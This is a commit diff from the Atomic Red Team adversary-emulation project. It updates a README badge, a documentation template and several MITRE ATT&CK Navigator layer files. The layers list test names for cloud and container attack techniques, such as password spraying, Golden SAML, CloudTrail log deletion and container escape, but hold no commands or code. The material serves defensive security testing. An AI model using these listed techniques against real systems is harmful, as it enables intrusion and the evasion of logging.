Update T1572.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>

README.md

@@ -2,7 +2,8 @@
 
 # Atomic Red Team
 
-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1670-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1717-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+
 
 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use

atomic_red_team/atomic_doc_template.md.erb

@@ -1,7 +1,11 @@
 # <%= technique['identifier'] %> - <%= technique['name'] -%>
 
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
-<blockquote><%= technique['description'].gsub("%\\<", "%<") %></blockquote>
+<blockquote>
+
+<%= technique['description'].gsub("%\\<", "%<") %>
+
+</blockquote>
 
 ## Atomic Tests
 <% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
+{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Containers)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
+{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
+{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":6,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
+{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":6,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
